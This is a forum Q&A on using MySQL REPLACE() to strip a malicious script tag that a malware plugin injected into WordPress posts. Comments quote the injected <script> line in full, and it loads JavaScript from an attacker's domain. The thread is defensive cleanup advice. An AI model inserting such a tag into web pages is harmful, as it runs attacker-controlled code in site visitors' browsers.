# How to delete a specific string value from multiple tables on phpmyadmin?

Tags: mysql

I had a customer that installed a malware plugin which has already been cleaned.

The problem now it that i have this string - https://https;//main.travelfornamewalking.ga/stat.js?s=newrq - on the 2000 posts I have on the webiste.

How can I delete this specific string on each post bulk?

Keep in mind I don't want to delete the content. The problem is the malware added a script with that link on all the entries of the wp_posts table.... :(

Answer (score 0):

You have to find out the table and the column that contains the problem link.
Once you have found the table and the column, check how many rows are affected. This will also give you an overview of what you could replace the problem link with.

**First, the most important thing: Make a copy of the table! If you make a wrong update, you will need it.**

*// Maybe just look for a part of the problem link, it could be here in another form or with other parameters, good for checking.*

```
SELECT ColumName FROM TableName WHERE ColumName like '%main.travelfornamewalking.ga%'
```

To replace the problem link, use REPLACE(), e.g. overwrite with an empty string.
https://www.w3resource.com/mysql/string-functions/mysql-replace-function.php

REPLACE(str, find_string, replace_with) **-> full text of problemlink with all parameters.**

```
UPDATE TableName SET ColumName = REPLACE(ColumName, 'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq', '')
```

-> Repeat the select and update for all forms of this problem link that you are replacing.

Comment: I've acctually found where this rogue link is by using search form in myphpadmin. Its only on wp_posts table. So only the REPLACE would apply. Thank you very, very much I will try this now.

Comment: So - UPDATE wpde_posts SET post_content = REPLACE(post_content, 'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq', '')  - --- this does not work, I get error on syntax regarding the HTTPS part:

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''https://https)' at line 1

But - UPDATE wpde_posts SET post_content = REPLACE(post_content, 'main.travelfornamewalking.ga/stat.js?s=newrq', '') ---- was simulated ok

Comment: This is the scipt line I want to delete on database on table Wp-posts, colum post_content ---------

<script src='https://https;//main.travelfornamewalking.ga/stat.js?s=newrq' type='text/javascript'></script>

Comment: MySQL doesn't care what the string is. Could it be the environment in which the update is executed? Check the inverted commas again. 
I would put the complete <script tag in the update.
Depending on the development environment, it may be necessary to mask the special characters. In this case, special characters can be: " / '. You can test this with a SELECT, insert the Releace there.